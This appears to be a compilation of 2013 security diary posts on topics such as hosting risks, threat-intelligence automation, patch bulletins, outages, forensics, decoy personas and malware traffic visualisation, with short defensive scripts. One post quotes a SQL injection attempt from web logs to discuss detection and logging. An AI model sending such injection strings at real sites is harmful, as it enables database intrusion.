- Denied access to data (internet) – This can happen in a number of ways. The Internet connection may be removed, which obviously cuts your and anyone else’s access. Sometimes machines are shut down. Whilst many administrators may decide to keep things running (after all, earning some money is better than none), supporting services may be reduced to cut costs, and if something breaks it is unlikely to get fixed.

- Denied access to data (Local) – You may decide to go pick up your data, but getting access may not be that easy. So unless you can retrieve it remotely you may have to kiss that goodbye.

- Backups – Any backups taken by the hosting provider are unlikely to be accessible. Depending on the systems used to manage backups it may be quite a task to get them. Even if you get the physical tapes (if used) you are unlikely to get the backup catalogue, so retrieving data will be difficult.

- Disclosure of data – Physical access usually trumps most of the controls many of us place on our hosted environment and in the cloud we do not have any control. So it is quite likely that you will not be able to deny access of third parties to your data.

- Denied Access – If you are denied access to your servers or data, a DR environment is probably your best bet. Being able to run up services elsewhere provides processing capabilities whilst lawyers sort out getting physical assets back. However tempting it may be, it is probably not a great idea to have the production environment and your DR environment hosted by the same organisation.

- Backups – Make your own. Do not rely on the hosting provider to do all the backups. Alternatively make sure that backups are stored elsewhere, including the catalogue so you can readily identify the data on the tapes, if needed.

- Disclosure of data – This is probably the most difficult one and makes you wish that the Mission Impossible slogan (this message will self-destruct in …) were a reality. Not many of us are in the habit of using full disk encryption on servers, but that may be the only way, and it won’t help in a PaaS or SaaS situation.


Cyber Intelligence Tsunami

This week fellow handler Chris posted about gathering intelligence from blog spam, and the SANS ISC has posted a number of times about cyber intelligence as a valuable resource. As you may know by now, Russ has also posted on his blog about CIF, the Collective Intelligence Framework.

Out of the box, and with only a little configuration, CIF links to a number of automatically ingested intelligence feeds, including some from the SANS ISC.

So, once you have gathered all this open source intelligence, one of the powers of CIF is that it can produce Snort rules, iptables rules and so on, but that is only the start.

MITRE has this year released definitions for STIX, TAXII and CYBOX to aid in this space, to allow analysts to describe and transfer cyber intelligence from place to place, from peer organisation to peer organisation, or indeed from cyber intelligence hub to their members. There are other ways this has been defined, and IODEF is one of those.

So, what is the next step? Assuming you have implemented some sort of automated intelligence gathering operation, you will now have a database or similar full of actionable information. How do you apply that to your organisation, and how do you enrich that information to make it truly actionable intelligence?

The next step is to bolt into (or implement if you have not already) the automation you have in place within your organisation to search your security logs for potential hits for these indicators.

Examples here can include using the Splunk API to automate searches for C2 indicators, or running other searches across your logs using regexes built from the data you have collected. A good open source example of this is using MalwareSigs to provide regular jobs you can run to search for badness.
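As a minimal sketch of the regex approach (not the Splunk API and not MalwareSigs; the function names and sample data are made up for illustration), the following compiles a set of collected indicators into one pattern and reports which log lines contain them. It assumes the indicators are plain IP addresses and domain names, and it deliberately treats a subdomain of a listed domain as a hit.

```python
import re


def build_indicator_pattern(indicators):
    """Compile one regex that matches any indicator as a whole token."""
    # Longest first, so a longer indicator wins over one that is its prefix.
    escaped = sorted((re.escape(i.lower()) for i in indicators),
                     key=len, reverse=True)
    # The lookarounds stop 10.0.0.1 from matching inside 110.0.0.12 and
    # evil.example.com from matching inside notevil.example.com.
    return re.compile(r"(?<![\w-])(?:" + "|".join(escaped) + r")(?![\w-]|\.\w)")


def find_hits(log_lines, indicators):
    """Return (line number, indicator, line) for every indicator found."""
    if not indicators:
        return []
    pattern = build_indicator_pattern(indicators)
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        for match in pattern.finditer(line.lower()):
            hits.append((line_no, match.group(0), line.rstrip("\n")))
    return hits


if __name__ == "__main__":
    sample_logs = [
        "GET http://evil.example.com/a from 10.1.1.5",
        "dst=110.0.0.12",
        "dst=10.0.0.1:443",
    ]
    for hit in find_hits(sample_logs, {"evil.example.com", "10.0.0.1"}):
        print(hit)
```

Run as a regular job against fresh logs, something like this gives you a list of hits to feed into whatever triage process you already have.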

So, once your searches have found hits, what do you do with them? You should certainly automate as many of your processes as possible, or at least make them as light touch as possible. IPs and domains that intelligence shows as highly likely to be malicious could be blocked or recategorised automatically, with the understanding that the intelligence is not always 100% accurate and blocking may have an impact.

Which other examples can you think of that would allow the automation of intelligence-led analysis to relieve you, your team members and your organisation from what will become the Cyber Intelligence Tsunami?
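One way to keep that impact in check is to block only high-confidence indicators and never touch addresses you have explicitly allowlisted. The sketch below is purely illustrative: the (address, confidence) tuples, the threshold of 90 and the function name are assumptions of mine, not something CIF defines. It only prints rule text and leaves applying it to you.

```python
import ipaddress


def blocking_rules(indicators, min_confidence=90, allowlist=()):
    """Turn (address, confidence) pairs into iptables/ip6tables DROP rules.

    The confidence scale (0-100) and the default threshold are hypothetical.
    """
    allowed = [ipaddress.ip_network(net) for net in allowlist]
    rules = []
    for address, confidence in indicators:
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            continue  # not an IP address (for example a domain); skip it
        if confidence < min_confidence:
            continue  # not certain enough to block automatically
        if any(ip in net for net in allowed):
            continue  # never block our own or partner address space
        tool = "iptables" if ip.version == 4 else "ip6tables"
        rules.append(f"{tool} -A INPUT -s {ip} -j DROP")
    return rules


if __name__ == "__main__":
    feed = [("203.0.113.5", 95), ("198.51.100.7", 40), ("192.168.1.10", 99)]
    for rule in blocking_rules(feed, allowlist=["192.168.0.0/16"]):
        print(rule)
```

Lower-confidence hits are probably better routed to an analyst queue than dropped silently.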


Blog Spam - annoying junk or a source of intelligence?

Chris Mohan --- Internet Storm Center Handler on Duty


Network Solutions Outage

Network Solutions appears to be experiencing an extended outage. A note posted to Facebook indicates that the outage may be related to a larger compromise of customer sites.

"Network Solutions is experiencing a Distributed Denial of Service (DDOS) attack that is impacting our customers as well as the Network Solutions site. Our technology team is working to mitigate the situation. Please check back for updates."

The referenced blog website is currently responding slowly as well (it redirects to a networksolutions.com site, which may be affected by the overall outage of "networksolutions.com" ). After a couple minutes, the blog post loaded for me, and it is more or less a copy of the Facebook post above:

"On July 15, some Network Solutions customer sites were compromised. We are investigating the cause of this situation, but our immediate priority is restoring the sites as quickly as possible. If your site has been impacted and you have questions, please call us at 1-866-391-4357."

Various web sites hosting DNS with Network Solutions appear to be down as well as a result. The outage appears to be diminishing over the last 15-30 min or so (4pm GMT) with some affected sites returning back to normal.

This outage comes about 3-4 weeks after the bad DDoS mitigation incident that redirected a large number of Network Solutions hosted sites to an IP in Korea. (see http://blogs.cisco.com/security/hijacking-of-dns-records-from-network-solutions/ )

Network Solutions' Facebook page: https://www.facebook.com/networksolutions

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


Why don't we see more examples of web app attacks via POST?

Was just browsing my web logs again, and came across this stupid little SQL injection attempt:

GET //diary.html?storyid=3063//////////////-999.9+union+select+0-- HTTP/1.1

There were more like it. The reason I call this "stupid" is that it probably wouldn't even work if I were vulnerable (MySQL at least requires a space after the comment marker). So I went looking for other attempts (I found a few), but they had similar elementary mistakes, or used well known "bad" user agents that are frequently blocked (Firefox 3.5.9 ?! Really?)

So I was wondering: Why don't I ever see "better" attacks? One issue may be that web logs usually don't capture the "POST" request data. If you capture it at all, you capture it using a WAF or IDS if the request was suspect. Also, capturing full posts presents other problems. The data could be quite large, and may contain personal data that should not be logged (usernames and passwords).

Anybody got a good way of logging "sanitized" POST requests?
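To get the discussion started, here is a minimal sketch of one possible approach, assuming the body is a standard application/x-www-form-urlencoded form. The field list, the length cap and the function name are my own guesses and would need tuning per application. It redacts fields that look sensitive, truncates oversized values, and uses repr() so that newlines in a value cannot forge extra log lines.

```python
from urllib.parse import parse_qsl

# Hypothetical list of field names we never want to see in a log.
SENSITIVE_FIELDS = {"password", "passwd", "pass", "pwd", "token",
                    "secret", "username", "user"}
MAX_VALUE_LENGTH = 64


def sanitize_post_body(body, sensitive=SENSITIVE_FIELDS,
                       max_len=MAX_VALUE_LENGTH):
    """Return a loggable one-line summary of a urlencoded POST body."""
    cleaned = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name.lower() in sensitive:
            value = "[REDACTED]"
        elif len(value) > max_len:
            # Keep the start of the value and note the original size.
            value = value[:max_len] + f"...[{len(value)} chars]"
        cleaned.append(f"{name}={value!r}")
    return " ".join(cleaned)


if __name__ == "__main__":
    print(sanitize_post_body(
        "user=bob&password=hunter2&storyid=-999.9+union+select+0--"))
```

This keeps the injection attempt readable while dropping the credentials. It does nothing for multipart uploads or JSON bodies, which would need their own handling.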

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


Problems with MS13-057

InfoWorld is reporting [1] that the WMV codec patch included in MS13-057 causes a number of video related applications to show partially blank screens. The applications include Techsmith Camtasia, Adobe Premiere Pro CS6 and others.

Please let us know if you experienced any issues like that.

[1] http://www.infoworld.com/t/microsoft-windows/another-botched-windows-patch-ms13-057kb-2803821kb-2834904-222636

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


System Glitch - Multiple New Diary Notifications

We experienced a system glitch today, which resulted in repeated notifications being sent out regarding a recently-published diary. We apologize for the inconvenience and are investigating this problem.

-- Lenny


Decoy Personas for Safeguarding Online Identity Using Deception

What if online scammers weren't sure whether the user account they are targeting is really yours, or whether the information they compiled about you is real? It's worth considering whether decoy online personas might help in the quest to safeguard our digital identities and data.

I believe deception tactics, such as selective and careful use of honeypots, hold promise for defending enterprise IT resources. Some forms of deception could also protect individuals against online scammers and other attackers. This approach might not be quite practical today for most people, but in the future we might find it both necessary and achievable.

Human attackers and malicious software pursue user accounts and data on-line through harvesting, phishing, password-guessing, software vulnerabilities, and various other means. How might we use decoys to confuse, misdirect, slow down and detect adversaries engaged in such activities?

Black-Ops Reputation Management

One example of using deception to control what information is visible about a person online is described in the article Scrubbed, written by Graeme Wood. It details the shady practice of "black-ops reputation management." The article discusses one firm's services to drown out negative news about their wealthy clients by publishing flattering, but often misleading or untrue information. The firm builds "white-noise websites, engineered to drown out an ugly signal and designed perhaps less for discerning human readers than for search-engine robots, which organize and curate all the information users discover via search."

These practices are often aimed at bumping negative stories about the client off the first page of search engine results, since few people look beyond the first page when casually looking for information about the person. Reportedly, this "black-ops" service costs $10,000 per month and involves "mining the client's history of publication and philanthropy, then pumping up the volume to drown out all else."

Such services sometimes include the creation of positive, but fake online personas that use the client's name. This way, one could never be certain whether the flattering information referred to the doppelgänger or the real person whose reputation needed a boost.

The article's author "imagined a future in which rich people create dozens of scapegoats for themselves, like Saddam Hussein with his body doubles." I am wondering whether similar techniques could be used for good—to help protect people against online scams and attacks—without being expensive.

Honeypot Email Addresses for Catching Spammers and Misdirecting Attackers

One example of a basic deception practice employed by some individuals today involves using a unique email address for every service with which the person signs up. If the person starts receiving spam on one of those email addresses, he or she can easily determine which service leaked or misused the address.

A more technical variation of this technique, called spamtrap, employs honeypot email addresses that are created for the sole purpose of luring spammers. As the Wikipedia article explains, this address is typically only published in a manner that's not directly visible to humans, so that "an automated e-mail address harvester (used by spammers) can find the email address, but no sender would be encouraged to send messages to the email address for any legitimate purpose."

Given the popularity of email as an initial attack vector, individuals could safeguard themselves by using different email addresses for different online services. Moreover, they could purposefully expose some email addresses that are not used for important, personal communications. Any correspondence sent to these addresses can be assumed to be malicious. An extra step might involve setting up fake social networking profiles for these addresses.
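A minimal sketch of the per-service address idea follows. It assumes your mail provider supports plus-addressing (mailbox+tag@domain), which not all do, and it adds a short keyed tag so that an outsider cannot simply guess the address you gave to another service. The function names, the tag length and the address layout are all illustrative choices, not an established scheme.

```python
import hashlib
import hmac


def service_address(mailbox, domain, service, secret):
    """Derive a unique, hard-to-guess address for one online service."""
    service = service.lower()
    tag = hmac.new(secret, service.encode(), hashlib.sha256).hexdigest()[:8]
    return f"{mailbox}+{service}.{tag}@{domain}"


def leaked_service(recipient, mailbox, domain, secret):
    """Return the service an address was issued to, or None if not ours."""
    local, _, rcpt_domain = recipient.lower().partition("@")
    base, _, suffix = local.partition("+")
    service, _, _tag = suffix.rpartition(".")
    if rcpt_domain != domain or base != mailbox or not service:
        return None
    # Recompute the address; a forged or mistyped tag will not match.
    expected = service_address(mailbox, domain, service, secret)
    return service if expected == recipient.lower() else None


if __name__ == "__main__":
    key = b"keep-this-private"
    address = service_address("alice", "example.com", "Shop", key)
    print(address)
    print(leaked_service(address, "alice", "example.com", key))
```

If spam arrives at one of these addresses, the recovered service name tells you who leaked or misused it, and mail sent to an address with an invalid tag can be treated as suspicious by default.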

Decoy Social Network Profiles

The wealth of personal details available on social networking sites allows attackers to target individuals using social engineering, secret question-guessing and other techniques. For some examples of such approaches, see The Use of Fake or Fraudulent LinkedIn Profiles and Data Mining Resumes for Computer Attack Reconnaissance.

Setting up one or more fake social network profiles (e.g., on Facebook) that use the person's real name can help the individual deflect the attack or can act as an early warning of an impending attack. A decoy profile could purposefully expose some inaccurate information, while the person's real profile would be more carefully concealed using the site's privacy settings. Decoy profiles would be associated with spamtrap email addresses.

Similarly, the person could expose decoy profiles on other sites, for instance those that reveal shopping habits (e.g., Amazon), musings (e.g., Twitter), skills (e.g., GitHub), travel (e.g., TripIt), affections (e.g., Pinterest), music taste (e.g., Pandora) and so on. The person's decoy identities could also have fake resumes available on sites such as Indeed and Monster.com.

Realism of Decoy Online Personas

If decoy online personas become popular, attackers will become more careful about profiling victims to flag fake data. This in itself might be a good thing, because such activities would increase attackers' costs, which some consider a worthy accomplishment for any defender.

With time, the defenders will need to ensure that their doppelgängers appear realistic, for example by demonstrating a steady stream of updates on decoy profiles and activity streams. This could be accomplished and automated with specialized tools. Such tools would build upon the capabilities of social media management utilities like HootSuite. A honeypot online persona might even have a phone number and an inbox, provided by tools such as Google Voice. The tools might further add realism to the decoy by automatically responding to the attacker's calls, emails and chat messages.

Using decoys to protect online identities might be overkill for most people at the moment. However, as attack tactics evolve, employing deception in this manner could be beneficial. As technology matures, so will our ability to establish realistic online personas that deceive our adversaries.

-- Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers' IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter and Google+. He also writes a security blog.


Hmm - where did I save those files?

A client recently called me with some bad news. "Our CFO's laptop was just stolen!" he told me - "What should we do?". My immediate response (and out-loud I'm afraid) was "Fire up the Delorean, go back in time and encrypt the drive". Needless to say, he wasn't keen on my response, even though I offered up a spare flux capacitor - maybe his Delorean was in the shop.

His response actually surprised me: "We're actually in the middle of a WDE (Whole Disk Encryption) project. The CFO's laptop was scheduled for next week (delayed at his request)". But no matter how good that project is, it wasn't helping us today.

This client is under both NERC and PCI regulation, so I asked the obvious "did he have any financial data on his machine? Do you need to disclose the theft as a breach?". The response was an immediate "he says not". Since the answer wasn't a definite "no", I asked the obvious - "Do you believe him?" The answering pause really said it all.

The challenge we then had was to prove to the CFO, one way or the other, that sensitive data did or did not exist on the laptop. Having just taken SANS FOR408, I know for a fact that even if he didn't save anything to the laptop, indicators of the presence of files, along with fragments or full copies of those files, are strewn across the file system, registry and a kazillion other locations on the machine.

So the scenario and a fun forensics question to end your week is:

A Windows 7 laptop, fully patched with Office 2010 installed

The corporate browser is IE10, but Firefox is also installed

Using our comment form, share where you would look for sensitive files, fragments of files or indicators of the presence of files.

Passwords, links and other sensitive information are all in play.

Be sure to include the tool or method you would use to find any evidence - duplicate "findings" are perfectly fine, as long as the tool or method is different.

Let's assume that the user didn't download anything to the "downloads" directory, and didn't have "I don't know where I saved that file" files strewn across his local profile and drive (even though that's extremely likely)

I'll update this story in a week or so with how the story played out, and how we made the point to the CFO.

Happy forensicating everyone!

===============

Rob VandenBrink

Metafore


Microsoft Teredo Server "Sunset"

Microsoft has offered a Teredo server to allow users behind NAT gateways to obtain an IPv6 connection. Teredo was always considered a transition technology, used to obtain IPv6 connectivity if nothing else works to connect to a particular resource ("path of last resort"). With native IPv6 connectivity becoming more common, there will be less need for transition technologies like Teredo.

As we reported earlier, the host name for Microsoft's Teredo server (teredo.ipv6.microsoft.com) doesn't resolve currently. This is apparently part of a "test" to measure the impact of the service being turned off. As an alternative, Microsoft still offers the "test.ipv6.microsoft.com" hostname to connect to its Teredo servers. To adjust your settings, use:

netsh interface teredo set state client test.ipv6.microsoft.com
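If you manage more than a handful of machines, you may want to check which of the two host names resolves before pushing that setting. A minimal sketch, using only the two host names mentioned above; the function names are mine, and the resolver parameter exists only so the logic can be exercised without touching DNS.

```python
import socket


def resolves(hostname, resolver=socket.getaddrinfo):
    """Return True if the host name currently resolves to any address."""
    try:
        return len(resolver(hostname, None)) > 0
    except socket.gaierror:
        return False


def pick_teredo_server(candidates, resolver=socket.getaddrinfo):
    """Return the first candidate that resolves, or None if none do."""
    for name in candidates:
        if resolves(name, resolver):
            return name
    return None


def netsh_command(server):
    """Build the netsh command line quoted in this diary for a server."""
    return f"netsh interface teredo set state client {server}"


if __name__ == "__main__":
    server = pick_teredo_server(
        ["teredo.ipv6.microsoft.com", "test.ipv6.microsoft.com"])
    print(netsh_command(server) if server else "no Teredo server resolves")
```

The script only prints the command; running it on the clients is left to whatever deployment mechanism you already use.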

Of course, one may argue that with native IPv6 connectivity becoming more common, transition technologies like Teredo will be more important for those of us left out in the legacy internet.

Thanks to our reader Gebhard for pointing out these URLs with more details:

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter




Can You Hear Me Now? - - - Um, not so well ...

Today's story isn't about protecting corporate crown jewels so much as protecting yourself. Richard's story last month (When Hotel Alarms Sound - https://isc.sans.edu/diary/When+Hotel+Alarms+Sound/15998) got me thinking about personal physical security - in particular, the reader comment about not being able to hear fire alarms inside many datacenters struck a chord - most datacenters are not built with protection of the folks working there in mind. Even when the Health and Safety folks get involved, they'll check for cables across the floor (trip hazards), a first aid kit, clear exits and that's about it.


If you're like me, you spend a LOT of time in datacenters. Small datacenters to large ones, it seems like I'm in a different machine room every day. Over the long haul (30 years and counting), that adds up to a lot of hours! What I'm starting to notice is that some clients are putting signs up regarding noise levels and hearing protection, and some are even providing disposable earplugs.



A quick measurement shows that most larger datacenters are at roughly 100 dB or louder. In fact, even my lab (I have one rack out of 5 in the room) is in that range. This puts a good part of my work environment into the "red zone" for risk of hearing loss.


While this graph is simplistic (it does not account for frequency, for instance), you should be concerned about hearing damage after even a short time in most datacenters (in the range of 100 dB).
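To put a rough number on "a short time": the NIOSH recommended exposure limit, which is a general occupational guideline and not something taken from the graph, is 85 dBA averaged over 8 hours, with the allowed time halving for every 3 dB above that. A minimal sketch of that arithmetic follows; the function name is mine, and it is no substitute for a proper noise survey.

```python
def niosh_max_exposure_minutes(level_dba):
    """Allowed daily exposure in minutes under the NIOSH 85 dBA / 3 dB rule."""
    # 480 minutes (8 hours) at 85 dBA, halved for each additional 3 dB.
    return 480.0 / 2 ** ((level_dba - 85.0) / 3.0)


if __name__ == "__main__":
    for level in (85, 91, 100):
        minutes = niosh_max_exposure_minutes(level)
        print(f"{level} dBA: {minutes:.0f} minutes")
```

By that rule, a 100 dBA machine room uses up the whole daily allowance in about a quarter of an hour.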

What this means to me is that after 30 years, it's about time I started protecting what little of my hearing I've got left. I've been carrying a set of "real" earplugs, the kind that has a real Noise Reduction Rating (25 dB in this case), in my laptop bag. And like all the personal "critical infrastructure" I carry, I have a spare in the bag, and another in the trunk of my car.

What's really surprised me is that even in the rooms with the signage and dispensers, often I'm the only one wearing earplugs! I am, however, seeing more folks wearing noise-cancelling headphones, which I understand help in much the same way (I am not a doctor, so don't have an actual opinion on how effective these are - especially if you're playing Led Zeppelin or The Black Keys)

While we need an arsenal of technical gear to work, you'll need your ears both during and after work - for the little space it takes in the laptop bag, carrying hearing protection is a good investment. This article isn't meant as a definitive reference, I'd encourage you to do your own research on hearing and other safety issues.

===============

Rob VandenBrink

Metafore


.NL Registry Compromise

Based on a note on the website of SIDN [1], a SQL injection vulnerability was used to compromise the site and place malicious files in the document root. SIDN is the registry for the .NL country-level domain (Netherlands). As a result of the breach, updates to the zone file are suspended. There is no word as to any effects on the zone files, or whether the attackers were able to manipulate them.

[1] https://www.sidn.nl/en/news/news/article/preventieve-maatregelen-genomen-2/

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


Websense Appliance at 100% CPU

Some readers have reported in (Thanks!) that their inline Websense appliances are spiking to 100% after an update. The Websense team is aware and quickly working on a fix we are told. If you are seeing this behavior please let us know!

Richard Porter

@packetalien

richard at pedantictheory dot com


Adobe July 2013 Black Tuesday Overview

Adobe released their July 2013 Black Tuesday bulletins:

| # | Affected | CVE | Adobe rating |
|---|---|---|---|
| APSB13-17 | Flash Player | CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 | Critical |
| APSB13-18 | Shockwave | CVE-2013-3348 | Critical |
| APSB13-19 | Coldfusion | CVE-2013-3349 CVE-2013-3350 | Critical (v10) Important (v9) |

--

Swa Frantzen


Microsoft July 2013 Black Tuesday Overview

Overview of the July 2013 Microsoft patches and their status.

| # | Affected | Contra Indications - KB | Known Exploits | Microsoft rating(**) | ISC rating(*) clients | ISC rating(*) servers |
|---|---|---|---|---|---|---|
| MS13-052 | Multiple vulnerabilities allow privilege escalation and/or remote code execution. | | | | | |
| | .NET & silverlight CVE-2013-3129 CVE-2013-3131 CVE-2013-3132 CVE-2013-3133 CVE-2013-3134 CVE-2013-3171 CVE-2013-3178 | KB 2861561 | Microsoft claims CVE-2013-3131 and CVE-2013-3134 have been publicly disclosed. | Severity:Critical Exploitability:1 | Critical | Important |
| MS13-053 | Multiple vulnerabilities allow privilege escalation and/or remote code execution. | | | | | |
| | kernel mode drivers (KMD) CVE-2013-1300 CVE-2013-1340 CVE-2013-1345 CVE-2013-3129 CVE-2013-3167 CVE-2013-3172 CVE-2013-3173 CVE-2013-3660 | KB 2850851 | Microsoft claims CVE-2013-3172 and CVE-2013-3660 have been publicly disclosed. Moreover they claim to be aware of "targeted" attacks exploiting CVE-2013-3660. | Severity:Critical Exploitability:1 | PATCH NOW | Important |
| MS13-054 | A TrueType font parsing issue in the GDI+ library allows remote code execution. This affects a wide selection of software, and extra care should be taken to make sure all instances are patched. | | | | | |
| | GDI+ CVE-2013-3129 | KB 2848295 | No publicly known exploits. | Severity:Critical Exploitability:1 | Critical | Important |
| MS13-055 | A multitude of vulnerabilities are fixed in this month's IE cumulative patch; you want this one. All but one are memory corruption vulnerabilities. | | | | | |
| | MSIE CVE-2013-3115 CVE-2013-3143 CVE-2013-3144 CVE-2013-3145 CVE-2013-3146 CVE-2013-3147 CVE-2013-3148 CVE-2013-3149 CVE-2013-3150 CVE-2013-3151 CVE-2013-3152 CVE-2013-3153 CVE-2013-3161 CVE-2013-3162 CVE-2013-3163 CVE-2013-3164 CVE-2013-3166 | KB 2846071 | No publicly known exploits | Severity:Critical Exploitability:1 | Critical | Important |
| MS13-056 | An input validation problem in how DirectShow handles GIF files allows random code execution. | | | | | |
| | DirectShow CVE-2013-3174 | KB 2845187 | No publicly known exploits | Severity:Critical Exploitability:1 | Critical | Important |
| MS13-057 | An input validation problem in Windows Media Format (WMV - Windows Media Player, not to be confused with the infamous WMF format) allows random code execution. | | | | | |
| | Media Player CVE-2013-3127 | KB 2847883 | No publicly known exploits | Severity:Critical Exploitability:2 | Critical | Important |
| MS13-058 | An unquoted path vulnerability (see more on what this is in Mark Baggett's excellent diary on the unquoted path issues) in Windows Defender allows privilege escalation to the LocalSystem account. | | | | | |
| | Windows defender CVE-2013-3154 | KB 2847927 | No publicly known exploits | Severity:Important Exploitability:1 | Important | Important |

We appreciate updates

US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating. We use 4 levels:

- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.

- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.

- Important: Things where more testing and other measures can help.

- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.

- The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.

- The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.

- Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.

- All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.

--

Swa Frantzen


Why do we Click?

Introduction

Details

- When you are tired you might make mistakes.

- When you are stressed and tired you are even more likely to make mistakes.

- When you are stressed, hungry, and tired + + +

Conclusion

References


Is Metadata the Magic in Modern Network Security?

Today's security tools, used to analyze or detect suspicious activity, collect metadata, which usually refers to data about data that describes the how, when, where and who was involved. Metadata is a way of organizing, gluing together and discovering information that would otherwise be very difficult to manage, analyze and report on.

It involves using a tool or a series of tools against other data to extract key components. It can be something as simple as the information stored in a picture (e.g. size, color content, resolution) or as complex as the information that can be parsed out of TCP/IP traffic (e.g. source/destination addresses and ports, email address, website name, etc.). Computer forensics is another example of very complex metadata collection since it involves taking a device (USB stick, hard drive, etc.) and parsing every bit of content to be able to search and report on its content.

How much metadata is enough in security? There are a lot of tools out there, either commercial or freeware, that can be used to collect metadata to analyze a network attack or system compromise. What is interesting is that there are many standards established for various disciplines, but none of them seems to apply to network security. They can be viewed here [1].

All the tools used today to protect a network generate some form of metadata. Whether it is a NIDS/NIPS, firewall, proxy, DNS server, etc., all produce data that can be aggregated into a Security Information and Event Management (SIEM) system. The metadata stored in a SIEM is used to yield insights into patterns of suspicious activity, produce trends and hopefully prevent or limit the damage early.
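As a small illustration of the TCP/IP case, the sketch below pulls the addresses, protocol number and ports out of a raw IPv4 packet using only the fixed header layout. The function name and the dictionary keys are my own choices, and it assumes you already have the IP packet bytes with any link-layer header stripped.

```python
import socket
import struct


def packet_metadata(packet):
    """Extract basic metadata from a raw IPv4 packet carrying TCP or UDP."""
    if len(packet) < 20:
        raise ValueError("too short for an IPv4 header")
    if packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    header_len = (packet[0] & 0x0F) * 4          # IHL is in 32-bit words
    (total_len,) = struct.unpack("!H", packet[2:4])
    protocol = packet[9]
    meta = {
        "src": socket.inet_ntoa(packet[12:16]),
        "dst": socket.inet_ntoa(packet[16:20]),
        "protocol": protocol,
        "length": total_len,
    }
    # TCP (6) and UDP (17) both start with source and destination ports.
    if protocol in (6, 17) and len(packet) >= header_len + 4:
        meta["sport"], meta["dport"] = struct.unpack(
            "!HH", packet[header_len:header_len + 4])
    return meta


if __name__ == "__main__":
    # Hand-built 20-byte IPv4 header followed by a zeroed TCP header.
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                         socket.inet_aton("192.0.2.1"),
                         socket.inet_aton("198.51.100.2"))
    print(packet_metadata(header + struct.pack("!HH", 49152, 80) + bytes(16)))
```

Six small fields per packet are already enough to build flow records, which is essentially what many network security tools store instead of the full payload.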

In the end, we all collect some form of metadata but is it useful or enough?

[1] http://en.wikipedia.org/wiki/Metadata_standards

[2] https://isc.sans.edu/diary/Collecting+Logs+from+Security+Devices+at+Home/14614

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Microsoft July Patch Pre-Announcement

Microsoft released its pre-announcement for the upcoming patch Tuesday. The summary indicates 7 bulletins in total: 6 are Critical, all with remote code execution, and 1 is Important. The announcement is available here [1].

[1] http://technet.microsoft.com/en-us/security/bulletin/ms13-jul

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Celebrating 4th of July With a Malware PCAP Visualization

It's been exactly five years since the ISC Diary discussed the Storm botnet and fireworks.exe. What better way to celebrate America's birthday than with another fireworks-like visualization? Much has changed in five years, including malware techniques, and the venerable AfterGlow visualization tool set, but some things remain consistent. Malware still sucks, sometimes it's really chatty, and when it is, the resulting PCAP can be rendered as a great picture. Raffy Marty's AfterGlow now includes a cloud version (like I said, much has changed in five years), but I rolled this graphic with a ZeroAccess sample and AfterGlow with Argus on an Ubuntu VM. An excellent analysis of this sample is provided by Contagio, so I'll spare you the details. Using the PCAP provided in that post, I executed argus -r zeroaccess.pcap -w - | ra -r - -nn -s saddr daddr -c, | perl afterglow.pl -c color.properties | neato -Tgif -o zeroaccess.gif. To simplify textually, the blue dot in the middle is our hapless victim system and the red nodes are all the evil minions it's conversing with.
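For readers without AfterGlow handy, the middle step of that pipeline (turning source,destination pairs into something Graphviz can draw) can be approximated in a few lines. This is a rough stand-in, not AfterGlow's actual logic: the function name is mine, the colouring rule is hard-coded rather than read from color.properties, and the sample addresses are documentation ranges, not the ZeroAccess peers.

```python
import csv
import io


def pairs_to_dot(csv_text, victim):
    """Convert 'source,destination' CSV lines into an undirected DOT graph."""
    edges = set()
    for row in csv.reader(io.StringIO(csv_text)):
        if len(row) >= 2 and row[0].strip() and row[1].strip():
            edges.add((row[0].strip(), row[1].strip()))  # de-duplicates pairs
    nodes = sorted({node for edge in edges for node in edge})
    lines = ["graph pcap {", "  node [style=filled, shape=circle];"]
    for node in nodes:
        # Victim in blue, everything it talks to in red.
        color = "blue" if node == victim else "red"
        lines.append(f'  "{node}" [fillcolor={color}];')
    for src, dst in sorted(edges):
        lines.append(f'  "{src}" -- "{dst}";')
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    sample = "10.0.0.5,203.0.113.9\n10.0.0.5,198.51.100.3\n"
    print(pairs_to_dot(sample, victim="10.0.0.5"))
```

The printed text can be piped into neato in the same way as AfterGlow's output in the command above.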

With the utmost respect, and sincere apologies to the Honorable Mr. Lincoln: We here highly resolve that these samples shall not have been analyzed in vain — that this Diary, under the World Wide Web, shall promote a new birth of security — and that an Internet of the people, by the people, for the people, shall not perish from the earth.

Happy 4th of July!!


